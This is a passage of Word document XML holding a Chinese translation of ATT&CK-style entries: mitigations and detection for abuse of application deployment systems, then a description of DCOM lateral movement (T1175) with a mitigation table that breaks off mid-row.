              <w:t>仅向有限数量的授权管理员授予对应用程序部署系统的访问权限。</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证可用于访问部署系统的帐户凭据是唯一的，并且不会在整个企业网络中使用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="3625E47A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739FB175" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId195" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>更新软件</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5067B8B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期修补部署系统，以防止潜在的通过漏洞利用访问系统后进行</w:t>
            </w:r>
            <w:hyperlink r:id="rId196" w:history="1">
              <w:r w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>权限升级</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66BAE54C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB91AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视辅助系统的应用程序部署。定期执行应用程序部署，以便不规则的部署活动脱颖而出。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控与已知良好软件无关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B817FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视部署系统上的帐户登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101006AB" w14:textId="232EC1B7" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1BF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式</w:t>
      </w:r>
      <w:r w:rsidR="00A072BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件对象模型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="28E8079A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DC94C7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> T1175</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16447B26" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C352703" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E267F7E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F60A13" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表，</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AED33C5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68785C4F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7A39D5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009B11D1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式组件对象模型（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是透明的中间件，它使用远程过程调用（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）技术将组件对象模型（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的功能扩展到本地计算机之外。</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序编程接口（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的一个组件，它支持软件对象之间的交互。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，客户端对象可以调用服务器对象的方法，这些方法通常是动态链接库（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或可执行文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2809993D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009B11D1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与本地和远程服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象交互的权限由注册表中的访问控制列表（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）指定。默认情况下，只有管理员可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程激活和启动</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348928D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009B11D1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对手可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行横向移动。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在适当特权用户的上下文中运行的攻击者可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序以及包含不安全方法的其他</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象远程获取任意甚至直接的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以在现有文档中执行宏，也可以直接通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序实例调用动态数据交换（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），从而避免了对恶意文档的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AF972" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCOM</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能会</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴露可以在对手活动链的其他区域（例如权限提升和持久性）中利用的功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="009B11D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B07C88" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="3B1A7AA4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="461"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7EA63961" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="49F4457C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="56D624D7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DFC232" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序隔离和沙盒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="002998C3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保启用所有</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> COM </w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>警报和受保护视图</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="5CD5E576" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70503F30" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>禁用或删除功能或程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51950461" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑通过</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Dcomcnfg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DCOM</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="651A35EC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D0D31C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3F9A96" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
